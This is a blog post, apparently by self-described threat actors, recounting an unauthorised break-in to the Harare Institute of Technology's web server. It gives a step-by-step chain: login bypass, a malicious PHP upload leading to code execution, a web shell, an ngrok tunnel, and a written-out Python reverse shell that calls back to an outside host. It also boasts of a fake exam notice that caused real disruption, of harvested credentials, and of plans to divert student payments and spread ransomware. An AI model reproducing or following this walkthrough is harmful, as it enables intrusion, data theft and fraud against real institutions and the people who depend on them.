n this article, I will be writing about a shady Institute, Harare Institute of Technology, with beyond horrible security practices. I think that the people at @HIT will equally appreciate my reporting on this. Let us prove that I was indeed able to hack into HIT web server real quick.
The above snapshots clearly show we were able to access their
Mysql database. Still, have doubts and want some more proof? Below is a screenshot of HIT’s root web directory:
Enough of the proof, I will not be disclosing any sensitive information on this server.
In short, we OWN them, We have all their data.
TL;DR How it happened
So now you might be curious to know how this happened, well! stay with me I will be explaining how I performed all the HACKS. Before we commence, get yourself a cup of coffee☕. Well!, you got your cup of coffee☕, now let’s get started.
HIT website has this cool feature that allows the procurement team to post Request for Quotations (RFQs). The staff would log in to an admin panel with a username and password, secure enough 😂. They then go on to post an RFQ with a title, due date, and a document that has more details about the RFQ and this is where it gets interesting, but first, let’s bypass the login
A Login Form Is Secure, Right? WRONG!
First I tried a random username and password and it threw an authentication error still secure enough. Next moved on to find out how the form was being submitted, can I exploit it somehow.
Now back to our RFQ documents. First I created my own RFQ entry and uploaded a pdf file and it worked just fine. So tried to upload a different file instead I uploaded a PHP script with a simple echo inside and to my surprise, well not surprised really, the file was uploaded and I was able to run it. I got a remote code execution!
Getting A Reverse Shell
Now it was time to get the infamous reverse shell. I uploaded the PHP reverse shell from pentest monkey but I couldn’t get a shell, the webmaster did a very good job😎 of making sure `PHP` cannot run any
shell commands. Next, I used
msfvenom to generate a raw reverse PHP shell but that too was a bust
After hours of scouring the internet I came across this web shell class that claimed to bypass any restrictions on PHP <= 7.4, I uploaded that one I got a web shell but that wasn’t useful on its own.
So what I did next was to test if I was able to run any system commands using the `web shell`. The first thing I did was to list the contents of the webroot directory. Voila! was able to get OS command Injection.
Again this wasn’t enough, for me to get a reverse shell, I needed either python or PHP installed on the system, so I went on and checked to see if python is available by injecting this command:
$ which python
The above snippet clearly shows that python was indeed installed on the system. Now, what next?
Tunneling Works All The Time
Two gems💎 already found (`python`, and `OS command Injection`), now I was left with one last gem to solve the mystery. I need some sought of way to tunnel a connection from a public URL to my application running locally, so for this
ngrok was the last gem💎 I need. Honestly, it sounds pretty cool, right? So I fire
ngrok and open my local `TCP port 443`. well you know what, why don’t I show you?
$ ngrok tcp 443
You can see I have a forwarded port and tunnel set up from port 443 (TCP) on my localhost, now publicly available at
Now anyone on the Internet can connect back to me.
Gaining Remote Control
After this, I set up a local
netcat listener to listen for incoming connection and carefully craft a python reverse shell:
Netcat listener listening on port 443 on my localhost:
$ nc -nlvp 433
netcat hungrily waiting for incoming connection
Carefully crafted python reverse shell with my
ngrok tunnel public host and port:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("4.tcp.ngrok.io", 11003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"]);'
Popping The Shell
I then went on injecting the above python reverse shell on the vulnerable command injection endpoint in other words the `web shell` I uploaded and voila!
Upgrade My Dumb Shell to a Fully Interactive Shell
The shell I first got was a dump shell, if you are a Linux user you probably know what a
dump shell is.
Dumpshells are limited, lacking the full power and functionality of a proper terminal. Certain things don’t work in these environments, and they can be troublesome to work with. Luckily, with a few commands, I was able to upgrade to a fully interactive shell with all the bells and whistles.
python -c "import pty; pty.spawn('/bin/bash')"
If you want to know more about the drawbacks `dump shell` have checkout this [article](https://null-byte.wonderhowto.com/how-to/upgrade-dumb-shell-fully-interactive-shell-for-more-flexibility-0197224/)
Let’s try out something interesting
Okay I know what you’re thinking, we get it, you hacked the webserver so what? Well unfortunately escalation to root was a bust but with time I’ll figure it out. So I thought what can I do with this, during that time there was an FBI hack by pompurine which sent kinda scary emails to users:
So thought why don’t I try something like that.
During this time, the institute was scheduled for exams in 3 days. There was speculation that exams might be postponed. There was an opportunity to try something here! Time to put my Photoshop skills to the test. HIT website has yet another awesome feature that allows the administration to post notices to students and other stakeholders. I took an old exams notice and rescheduled exams a month ahead and modified the HTML code to display my pwned notice. For the next couple of days, there was chaos no one could tell what was genuine or what isn’t. Some students even decided to leave the campus after hearing the great news. I suspect even the lecturers didn’t come to work the following day. In response to this, the institute sent text messages to students reassuring them that exams will continue as scheduled. And unfortunately, they fixed the vulnerability.
This wasn’t our end
Yes, the HIT guys managed to fix it by removing write access to the folder where notices were kept. They also did a great job of fixing the login form bypass vulnerability. But little did they know that by fixing vulnerabilities they’re just creating new puzzles for us to solves which makes our playground more interesting and fascinating. So this didn’t stop us from continuing to explore other attack vectors.
Bypass The Login Form Again!
I mean who puts
<script> tags before even opening the
HTML5 doctype declaration`. I figured there has to be some PHP code checking the credentials at the very beginning of the file and
I tried to intercept the response to the restricted page and as I suspected,
Edit & Delete Records
This allowed me to inject another PHP backdoor and get another reverse shell.
Back To Our Reverse Shell
Now have my PHP backdoor uploaded again it was time to do some deep internal enumeration, I have to hunt for that “little thing” as “the devil is in the detail“.
After hours of enumerating I found a lot of juicy stuff, which includes confidential Information & Users (for different services), clear text passwords, passwords that were encrypted with weak MD5 harsh which I was able to decrypt within a matter of seconds, sensitive files & databases, configurations files, and the list goes on forever.
Login to MySql
In the enumeration process I was able to get hold of the `Mysql` user and password, so tried to log in and I’m in:
Tried viewing a few database records and to my surprise, the users we created were there.
Organizations in Zimbabwe don’t take information security seriously. This incident shows that even the slightest hack can have serious consequences. To illustrate, let’s take a look at what I could have done instead of a prank. I love the cool features this website offers, online payments is my favorite. Since I could modify the HTML code I could just replace the! Paynow merchant configuration with my own and each time a payment is made, it’s to my account and this could go unnoticed for at least a month. They will simply assume the money is ‘hanging’, it does that sometimes. As of now, tuition is ZWL 42 148. On average, 2 students use paynow a day that’s ZWL 84 249 per day. In 30 days that’s ZWL 2 528 880! Using the current interbank exchange that’s US $21 990 just lost and I didn’t even need root access! Apart from this, the server has a lot of sensitive information which includes people who applied for jobs at the institute, student details that can be used for malicious activities. In short, there are a lot of malicious I could have done, like spreading ransomware on their network.
Thanks for reading! More blog posts coming soon from your favorite threat actors.